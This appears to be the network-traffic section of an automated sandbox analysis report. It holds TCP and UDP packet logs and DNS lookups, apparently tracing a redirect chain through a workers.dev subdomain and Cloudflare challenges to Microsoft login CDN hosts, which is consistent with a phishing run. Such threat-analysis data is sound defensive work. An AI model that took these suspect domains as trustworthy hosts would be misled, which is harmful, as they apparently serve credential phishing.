                                      Mar 22, 2024 15:24:16.276809931 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.276820898 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.276875019 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.276886940 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.276900053 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.276900053 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.276916981 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.276937962 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.276957989 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.276971102 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.276997089 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.277005911 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277021885 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277034998 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277040958 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.277075052 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277093887 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277108908 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.277120113 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277167082 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277196884 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.277252913 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.277283907 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.277307034 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.280257940 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.288269997 CET49781443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.288307905 CET44349781192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.333431005 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.333481073 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.333775997 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.338376999 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.338393927 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.366596937 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.366656065 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.366921902 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.367069006 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.367084980 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.607203007 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.633435965 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.633457899 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.634685993 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.634759903 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.635703087 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.636301994 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.636384010 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.636645079 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.636687994 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.636962891 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.636969090 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.637054920 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.637969017 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.638036966 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.638519049 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.684237003 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.685090065 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.786454916 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786689997 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786700010 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786731958 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786748886 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786756039 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.786756992 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786773920 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786817074 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.786977053 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.786998034 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.787044048 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.787049055 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.787060022 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.812416077 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.812561989 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.812628984 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.812628984 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.812680006 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.814994097 CET49784443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.815012932 CET44349784192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.841331005 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.876245022 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876261950 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876300097 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876332998 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.876348972 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876390934 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.876401901 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876454115 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.876872063 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876879930 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876914978 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876939058 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.876944065 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.876993895 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.877739906 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.877757072 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.877830982 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.877836943 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.877878904 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.878177881 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.878237009 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.878242970 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.878267050 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.878448009 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.880171061 CET49783443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.880182028 CET44349783192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.923079014 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.923131943 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:16.923253059 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.923914909 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:16.923929930 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.192497969 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.192918062 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.192950010 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.193955898 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.194034100 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.194863081 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.194952965 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.195167065 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.195173025 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.247582912 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.370862007 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.370927095 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.370989084 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.371000051 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:17.371043921 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.373841047 CET49785443192.168.2.4192.229.211.199
                                      Mar 22, 2024 15:24:17.373867035 CET44349785192.229.211.199192.168.2.4
                                      Mar 22, 2024 15:24:20.523586035 CET4434978213.107.246.40192.168.2.4
                                      Mar 22, 2024 15:24:20.523670912 CET4434978213.107.246.40192.168.2.4
                                      Mar 22, 2024 15:24:20.523974895 CET49782443192.168.2.413.107.246.40
                                      Mar 22, 2024 15:24:20.696259975 CET4434978013.107.246.40192.168.2.4
                                      Mar 22, 2024 15:24:20.696361065 CET4434978013.107.246.40192.168.2.4
                                      Mar 22, 2024 15:24:20.696429014 CET49780443192.168.2.413.107.246.40
                                      Mar 22, 2024 15:24:20.771938086 CET49780443192.168.2.413.107.246.40
                                      Mar 22, 2024 15:24:20.771970987 CET4434978013.107.246.40192.168.2.4
                                      Mar 22, 2024 15:24:20.772027969 CET49782443192.168.2.413.107.246.40
                                      Mar 22, 2024 15:24:20.772075891 CET4434978213.107.246.40192.168.2.4
                                      Mar 22, 2024 15:24:24.762332916 CET49734443192.168.2.454.242.173.168
                                      Mar 22, 2024 15:24:24.762361050 CET4434973454.242.173.168192.168.2.4
                                      Mar 22, 2024 15:24:40.498671055 CET49734443192.168.2.454.242.173.168
                                      Mar 22, 2024 15:24:40.498790026 CET4434973454.242.173.168192.168.2.4
                                      Mar 22, 2024 15:24:40.498850107 CET49734443192.168.2.454.242.173.168
                                      Mar 22, 2024 15:24:41.381537914 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:41.381575108 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:41.381653070 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:41.382128000 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:41.382138968 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:42.057389975 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:42.058357000 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:42.058381081 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:42.058783054 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:42.082981110 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:42.083204031 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:42.137123108 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:46.387336969 CET4972480192.168.2.423.206.121.39
                                      Mar 22, 2024 15:24:46.476368904 CET804972423.206.121.39192.168.2.4
                                      Mar 22, 2024 15:24:46.476437092 CET4972480192.168.2.423.206.121.39
                                      Mar 22, 2024 15:24:51.659272909 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:51.659343958 CET44349788142.251.40.164192.168.2.4
                                      Mar 22, 2024 15:24:51.659427881 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:52.499526024 CET49788443192.168.2.4142.251.40.164
                                      Mar 22, 2024 15:24:52.499556065 CET44349788142.251.40.164192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 22, 2024 15:23:38.432008982 CET53576621.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:38.434361935 CET53642831.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:38.985915899 CET53581631.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:39.279284000 CET6472753192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:39.279422045 CET6115753192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:39.367784977 CET53647271.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:39.386372089 CET53611571.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:39.986232996 CET5136153192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:39.986346960 CET5822053192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:40.080065012 CET53513611.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:40.082045078 CET53582201.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:41.326123953 CET4982553192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:41.326313972 CET5029253192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:41.417098045 CET53498251.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:41.417117119 CET53502921.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:50.858449936 CET5805653192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:50.858707905 CET5401553192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:50.952229023 CET53580561.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:50.952514887 CET53540151.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:51.426423073 CET5865053192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:51.427171946 CET5072953192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:51.514748096 CET53586501.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:51.515757084 CET53507291.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:52.918404102 CET4984353192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:52.919002056 CET5667953192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:53.006989002 CET53566791.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:53.007211924 CET53498431.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:53.970618963 CET5872753192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:53.971220970 CET5838653192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:54.058793068 CET53587271.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:54.059288979 CET53583861.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:56.324285984 CET53572601.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:56.616240025 CET5104153192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:56.616507053 CET5173753192.168.2.41.1.1.1
                                      Mar 22, 2024 15:23:56.711493015 CET53517371.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:56.713249922 CET53510411.1.1.1192.168.2.4
                                      Mar 22, 2024 15:23:57.956805944 CET138138192.168.2.4192.168.2.255
                                      Mar 22, 2024 15:24:09.492657900 CET5535553192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:09.492813110 CET5598553192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:09.588510990 CET53553551.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:09.589091063 CET53559851.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:15.181807041 CET53636801.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:15.252490044 CET5653553192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:15.252675056 CET5119953192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:15.253570080 CET5659053192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:15.253753901 CET6179353192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:15.341329098 CET53617931.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:15.341417074 CET53565901.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:16.832463026 CET6171953192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:16.833304882 CET5656453192.168.2.41.1.1.1
                                      Mar 22, 2024 15:24:16.921650887 CET53617191.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:16.922409058 CET53565641.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:37.347671986 CET53579201.1.1.1192.168.2.4
                                      Mar 22, 2024 15:24:38.210067987 CET53557291.1.1.1192.168.2.4
                                      TimestampSource IPDest IPChecksumCodeType
                                      Mar 22, 2024 15:24:15.597047091 CET192.168.2.41.1.1.1c2be(Port unreachable)Destination Unreachable
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 22, 2024 15:23:39.279284000 CET192.168.2.41.1.1.10x7706Standard query (0)manage.kmail-lists.comA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:39.279422045 CET192.168.2.41.1.1.10xbaf4Standard query (0)manage.kmail-lists.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:39.986232996 CET192.168.2.41.1.1.10xb360Standard query (0)bigswitch.co.inA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:39.986346960 CET192.168.2.41.1.1.10xa155Standard query (0)bigswitch.co.in65IN (0x0001)false
                                      Mar 22, 2024 15:23:41.326123953 CET192.168.2.41.1.1.10xf3c2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:41.326313972 CET192.168.2.41.1.1.10x503aStandard query (0)www.google.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:50.858449936 CET192.168.2.41.1.1.10xcc91Standard query (0)33208b95.7187b59e75e5ee4922ee53c8.workers.devA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:50.858707905 CET192.168.2.41.1.1.10x5a40Standard query (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev65IN (0x0001)false
                                      Mar 22, 2024 15:23:51.426423073 CET192.168.2.41.1.1.10x2a98Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:51.427171946 CET192.168.2.41.1.1.10x33adStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:52.918404102 CET192.168.2.41.1.1.10x5aaaStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:52.919002056 CET192.168.2.41.1.1.10xb562Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:53.970618963 CET192.168.2.41.1.1.10xa5adStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:53.971220970 CET192.168.2.41.1.1.10xd2e5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:56.616240025 CET192.168.2.41.1.1.10x459eStandard query (0)33208b95.7187b59e75e5ee4922ee53c8.workers.devA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:56.616507053 CET192.168.2.41.1.1.10x32dfStandard query (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev65IN (0x0001)false
                                      Mar 22, 2024 15:24:09.492657900 CET192.168.2.41.1.1.10x38c4Standard query (0)24karat.usA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:09.492813110 CET192.168.2.41.1.1.10xc0b2Standard query (0)24karat.us65IN (0x0001)false
                                      Mar 22, 2024 15:24:15.252490044 CET192.168.2.41.1.1.10x407eStandard query (0)acctcdn.msftauth.netA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.252675056 CET192.168.2.41.1.1.10x5840Standard query (0)acctcdn.msftauth.net65IN (0x0001)false
                                      Mar 22, 2024 15:24:15.253570080 CET192.168.2.41.1.1.10xe2e0Standard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.253753901 CET192.168.2.41.1.1.10x7dd7Standard query (0)logincdn.msftauth.net65IN (0x0001)false
                                      Mar 22, 2024 15:24:16.832463026 CET192.168.2.41.1.1.10xe914Standard query (0)logincdn.msftauth.netA (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:16.833304882 CET192.168.2.41.1.1.10x9cc6Standard query (0)logincdn.msftauth.net65IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 22, 2024 15:23:39.367784977 CET1.1.1.1192.168.2.40x7706No error (0)manage.kmail-lists.com54.242.173.168A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:39.367784977 CET1.1.1.1192.168.2.40x7706No error (0)manage.kmail-lists.com52.87.56.72A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:39.367784977 CET1.1.1.1192.168.2.40x7706No error (0)manage.kmail-lists.com54.160.41.174A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:39.367784977 CET1.1.1.1192.168.2.40x7706No error (0)manage.kmail-lists.com52.22.29.248A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:40.080065012 CET1.1.1.1192.168.2.40xb360No error (0)bigswitch.co.in69.49.245.172A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:41.417098045 CET1.1.1.1192.168.2.40xf3c2No error (0)www.google.com142.251.40.164A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:41.417117119 CET1.1.1.1192.168.2.40x503aNo error (0)www.google.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:50.952229023 CET1.1.1.1192.168.2.40xcc91No error (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev172.67.132.20A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:50.952229023 CET1.1.1.1192.168.2.40xcc91No error (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev104.21.4.125A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:50.952514887 CET1.1.1.1192.168.2.40x5a40No error (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev65IN (0x0001)false
                                      Mar 22, 2024 15:23:51.514748096 CET1.1.1.1192.168.2.40x2a98No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:51.514748096 CET1.1.1.1192.168.2.40x2a98No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:51.515757084 CET1.1.1.1192.168.2.40x33adNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:53.006989002 CET1.1.1.1192.168.2.40xb562No error (0)challenges.cloudflare.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:53.007211924 CET1.1.1.1192.168.2.40x5aaaNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:53.007211924 CET1.1.1.1192.168.2.40x5aaaNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:54.058793068 CET1.1.1.1192.168.2.40xa5adNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:54.058793068 CET1.1.1.1192.168.2.40xa5adNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:54.059288979 CET1.1.1.1192.168.2.40xd2e5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                      Mar 22, 2024 15:23:56.711493015 CET1.1.1.1192.168.2.40x32dfNo error (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev65IN (0x0001)false
                                      Mar 22, 2024 15:23:56.713249922 CET1.1.1.1192.168.2.40x459eNo error (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev172.67.132.20A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:56.713249922 CET1.1.1.1192.168.2.40x459eNo error (0)33208b95.7187b59e75e5ee4922ee53c8.workers.dev104.21.4.125A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:23:57.469918966 CET1.1.1.1192.168.2.40x9aa7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:23:57.469918966 CET1.1.1.1192.168.2.40x9aa7No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:09.588510990 CET1.1.1.1192.168.2.40x38c4No error (0)24karat.us162.220.165.249A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:11.414660931 CET1.1.1.1192.168.2.40xe5f7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:11.414660931 CET1.1.1.1192.168.2.40xe5f7No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.339370012 CET1.1.1.1192.168.2.40x41No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.339370012 CET1.1.1.1192.168.2.40x41No error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.339370012 CET1.1.1.1192.168.2.40x41No error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.340440035 CET1.1.1.1192.168.2.40x5840No error (0)acctcdn.msftauth.netacctcdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.340440035 CET1.1.1.1192.168.2.40x5840No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341329098 CET1.1.1.1192.168.2.40x7dd7No error (0)logincdn.msftauth.netcs1227.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341417074 CET1.1.1.1192.168.2.40xe2e0No error (0)logincdn.msftauth.netcs1227.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341417074 CET1.1.1.1192.168.2.40xe2e0No error (0)cs1227.wpc.alphacdn.net192.229.211.199A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341578007 CET1.1.1.1192.168.2.40x407eNo error (0)acctcdn.msftauth.netacctcdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341578007 CET1.1.1.1192.168.2.40x407eNo error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341578007 CET1.1.1.1192.168.2.40x407eNo error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.341578007 CET1.1.1.1192.168.2.40x407eNo error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.432562113 CET1.1.1.1192.168.2.40xd5eNo error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.432562113 CET1.1.1.1192.168.2.40xd5eNo error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.432562113 CET1.1.1.1192.168.2.40xd5eNo error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.432696104 CET1.1.1.1192.168.2.40xa2b8No error (0)cs1227.wpc.alphacdn.net192.229.211.199A (IP address)IN (0x0001)false
